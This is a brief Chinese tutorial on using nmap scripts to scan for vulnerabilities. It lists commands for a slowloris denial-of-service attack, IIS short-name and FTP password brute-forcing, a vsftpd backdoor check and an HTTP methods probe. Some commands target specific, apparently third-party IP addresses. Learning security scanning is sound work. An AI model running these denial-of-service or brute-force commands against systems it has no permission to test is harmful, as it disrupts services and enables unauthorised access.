nmap如何扫描漏洞_端口扫描工具nmap扫描漏洞教程
更新日期:2022-10-26
来源:系统部落
nmap是一款非常强大且界面清晰的端口扫描工具,但是很多用户安装之后不知道如何使用。nmap如何扫描漏洞呢?下面小编就来给大家介绍一下端口扫描工具nmap扫描漏洞教程。
端口扫描工具nmap如何扫描漏洞?
1、http 拒绝服务:nmap --max-parallelism 800--script http-slowloris scanme.nmap.org
2、IIS 短文件泄露:nmap -p 8080 --script http-iis-short-name-brute 61.142.64.176
3、ftp弱口令暴力破解:nmap --script ftp-brute --script-args brute.emptypass=true,ftp-brute.timeout=30,userdb=/root/dirtionary/usernames.txt,brute.useraspass=true,passdb=/root/dirtionary/passwords.txt,brute.threads=3,brute.delay=6 203.195.139.153
4、检测CVE-2011-2523中的ftp-vsftpd-backdoor:nmap -T2 --script ftp-vsftpd-backdoor 211.139.201.240
5、验证http中开启的-methods 方法:nmap -T3 --script http-methods --script-args http.test-all=true,http.url-path=/www.haoshangjia.com